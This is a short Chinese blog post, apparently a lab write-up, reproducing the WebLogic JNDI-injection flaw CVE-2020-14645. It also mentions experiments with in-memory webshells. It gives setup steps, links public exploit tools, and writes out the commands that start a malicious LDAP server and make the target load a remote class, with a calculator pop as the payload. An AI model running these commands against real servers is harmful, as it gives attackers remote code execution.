CVE-2020-14645
主要最近在研究weblogic的内存马,在github上面搜到https://github.com/feihong-cs/JNDIExploit 这个项目里面有一段内存马代码,想套用到14882那个漏洞上面,但是发现cmdshell可以,冰蝎的马好像有些问题。既然他是JNDI注入来运行class,那么我就想能不能和CVE-2020-14645联动起来。最终结果是失败的,原因暂时没有找到。
那么主要来复现一下CVE-2020-14645这个漏洞。
安装环境
安装jdk 8u131 版本,去官网下载即可,安装过程就省略了~
地址:https://www.oracle.com/cn/java/technologies/javase/javase8-archive-downloads.html
安装Weblogic 12.2.1.4版本,也去官网下载。
地址:https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
管理员身份运行cmd,然后输入jdk地址和安装包地址:
一直下一步就行
这里全部勾选最好。
运行Weblogic
下载工具
这里直接用github上面有的工具打就可以了
https://github.com/DSO-Lab/defvul/tree/master/CVE-2020-14645_Weblogic
下载下来然后mvn编译一下,即可
使用方法:
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
这里需要起一个JNDI服务,所以用到
https://github.com/welk1n/JNDI-Injection-Exploit 这个工具
复现成功
首先输入命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.91.1
起一个ldap的服务
然后在输入:
java -jar CVE-2020-14645.jar 192.168.91.1:1389/bcbiyj http://192.168.91.4:7001
最后成功弹出计算器